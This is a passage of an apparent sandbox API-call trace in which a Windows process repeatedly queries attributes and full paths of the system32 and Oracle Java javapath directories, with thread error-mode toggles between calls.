files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.188] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.188] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0151.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.191] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xad951269, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad951269, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0151.191] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.192] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xad951269, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad951269, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0151.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.193] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xad951269, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad951269, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0151.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.193] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xad951269, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad951269, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0151.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.194] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xad951269, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad951269, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0151.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.195] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xad951269, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad951269, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0151.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.196] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xad951269, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad951269, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0151.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.196] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xad951269, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad951269, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0151.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.197] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xad951269, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad951269, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0151.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.198] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xad951269, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad951269, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0151.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.198] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xad951269, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad951269, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0151.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.199] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.199] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xad951269, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad951269, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0151.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.199] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.199] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.200] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xad951269, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad951269, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0151.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.200] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xad951269, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad951269, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0151.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508e050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.201] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xafa508e580 | out: lpFileInformation=0xafa508e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xad951269, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad951269, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0151.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e460) returned 1 [0151.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4f0) returned 1 [0151.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e4f0) returned 1 [0151.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e490) returned 1 [0151.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e4a0) returned 1 [0151.207] 